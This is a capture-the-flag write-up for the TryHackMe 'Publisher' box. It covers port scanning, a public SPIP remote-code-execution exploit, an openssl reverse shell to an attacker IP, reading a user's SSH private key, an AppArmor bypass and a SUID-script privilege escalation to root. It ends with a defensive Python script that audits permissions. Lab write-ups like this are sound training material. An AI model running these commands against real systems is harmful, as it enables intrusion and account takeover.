TryHackMe Publisher WriteUp | Easy


Let's see what ports are open -

nmap -sVC -T4 10.10.210.141
Nmap scan report for 10.10.210.141
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Publisher's Pulse: SPIP Insights & Tips
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As per the hint in the challenge description, we will search for an RCE exploit for SPIP -

searchsploit spip
SPIP v4.2.0 - Remote Code Execution (Unauthenticated)                                                     | php/webapps/51536.py

We will use this GitHub exploit to get the initial foothold - CVE-2023-27372

git clone https://github.com/0SPwn/CVE-2023-27372-PoC
cd CVE-2023-27372-PoC
pip install -r requirements.txt
python3 exploit.py -u "http://10.10.210.141/spip/spip.php?page=spip_pass&lang=fr"

Getting an encrypted reverse shell using openssl (in place of plain nc)

On the attacker machine -

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

On the victim -

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.8.47.242:1337 > /tmp/s; rm /tmp/s

Stabilize it -

script -qc /bin/bash /dev/null

OR

Copy the id_rsa of the think user and log in over SSH

cat /home/think/.ssh/id_rsa

Privesc To Root -

Bypass AppArmor using the perl trick from HackTricks (AppArmor section) -

echo '#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
/dev/shm/test.pl

SUID /usr/sbin/run_container -

find / -perm /4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container <-----
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

Running /usr/sbin/run_container

think@publisher:~$ run_container
List of Docker containers:
ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 17 minutes

Enter the ID of the container or leave blank to create a new one: 41c976e507f8
/opt/run_container.sh: line 16: validate_container_id: command not found  <---------

OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:

Editing /opt/run_container.sh to get root

cp /usr/bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
/usr/sbin/run_container
41c976e507f8
3
/tmp/rootbash -p

bash-5.0# whoami
root
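The root cause of this privesc is a SUID binary that hands control to a script an unprivileged user can modify. The following is an added audit check (not part of the original writeup) covering the permission bits a defender should verify on such a helper script; it assumes the box's /opt/run_container.sh as the default path and accepts other paths as arguments:

```python
#!/usr/bin/env python3
"""Audit the helper script behind a SUID wrapper (added example, not from the writeup).

A SUID binary such as /usr/sbin/run_container is only as trustworthy as every file
it executes: if /opt/run_container.sh, or the directory holding it, can be modified
by an unprivileged user, that user can make root run arbitrary commands.
"""
import os
import stat
import sys


def assess_mode(mode, uid, gid, parent_mode, parent_uid):
    """Return findings for a script given its st_mode/owner and its parent's.

    An empty list means the permission bits alone do not let a non-root user
    edit or replace the script (ACLs and mount options are not considered).
    """
    findings = []
    if uid != 0:
        findings.append(f"script owned by uid {uid}, not root")
    if mode & stat.S_IWOTH:
        findings.append("script is world-writable")
    if mode & stat.S_IWGRP and gid != 0:
        findings.append(f"script is group-writable by gid {gid}")
    # A writable parent without the sticky bit lets anyone rename the script away
    # and drop a replacement in its place, even if the script itself is read-only.
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        findings.append("parent directory is world-writable without the sticky bit")
    if parent_uid != 0:
        findings.append(f"parent directory owned by uid {parent_uid}, not root")
    return findings


def audit_script(path):
    """Stat a script and its parent directory and return the findings."""
    st = os.stat(path)
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    return assess_mode(st.st_mode, st.st_uid, st.st_gid, parent.st_mode, parent.st_uid)


if __name__ == "__main__":
    # Defaults to the script the box's SUID wrapper runs; pass other paths as arguments.
    for target in sys.argv[1:] or ["/opt/run_container.sh"]:
        try:
            problems = audit_script(target)
        except OSError as exc:
            print(f"{target}: cannot stat ({exc.strerror})")
            continue
        print(f"{target}: {'; '.join(problems) or 'OK'}")
```

The same check applies to anything else a SUID wrapper executes or sources, including files it reaches through a relative path or an attacker-controlled PATH.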